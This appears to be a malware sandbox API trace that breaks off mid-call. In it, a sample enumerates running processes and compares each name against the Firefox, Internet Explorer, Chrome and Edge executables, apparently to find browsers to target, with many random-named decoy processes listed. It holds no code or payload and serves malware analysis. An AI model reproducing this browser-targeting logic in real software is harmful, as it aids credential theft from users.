[0190.804] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0190.804] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0190.804] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.804] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.804] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0190.804] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0190.804] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0190.804] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.804] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0190.805] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0190.805] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0190.805] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0190.805] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.805] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.805] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.805] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.805] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.808] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.808] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.808] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.808] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.808] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.809] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.809] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.809] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.809] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.809] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.809] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.809] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.809] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.810] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.810] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.810] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.810] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.810] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.810] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.810] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.811] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0190.811] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0190.811] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0190.811] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.811] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.811] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.811] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.811] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.811] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.811] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.812] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.812] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.812] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.812] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.812] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.812] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0190.812] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0190.812] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0190.812] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.812] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.813] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0190.813] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0190.813] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0190.813] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.813] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0190.814] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0190.814] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0190.814] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0190.814] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.814] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.814] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.814] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.814] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.814] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.814] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0190.815] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0190.815] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0190.815] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0190.815] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.815] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0190.815] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0190.815] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0190.815] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0190.815] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.815] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0190.816] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0190.816] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0190.816] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0190.816] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.816] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0190.816] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0190.816] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0190.816] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0190.816] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.816] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0190.817] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0190.817] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0190.817] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0190.817] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.817] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0190.818] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0190.818] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0190.818] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0190.818] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.818] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0190.818] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0190.818] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0190.818] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0190.818] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.818] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0190.819] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0190.819] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0190.819] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0190.819] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0190.819] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0190.819] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0190.819] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0190.819] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.819] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0190.820] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0190.820] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0190.820] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0190.820] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.820] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0190.820] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0190.820] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0190.820] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0190.820] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.820] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0190.821] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0190.821] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0190.821] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0190.821] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.821] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0190.822] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0190.822] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0190.822] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0190.822] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.822] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0190.822] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0190.822] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0190.822] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0190.822] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.822] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0190.823] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0190.823] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0190.823] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0190.823] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.823] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0190.823] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0190.823] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0190.823] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0190.823] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.823] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0190.824] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0190.824] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0190.824] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0190.824] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.824] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0190.824] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0190.824] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0190.824] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0190.825] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.825] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0190.825] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0190.825] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0190.825] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0190.825] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.825] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0190.826] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0190.826] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0190.826] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0190.826] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.826] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0190.826] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0190.826] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0190.826] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0190.826] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.826] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0190.827] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0190.827] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0190.827] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0190.827] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.827] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.827] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0190.827] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0190.827] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0190.827] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.827] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.828] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.828] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.828] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.828] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.828] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0190.829] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0190.829] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0190.829] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0190.829] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.829] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.829] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.829] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.829] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.829] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.829] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: 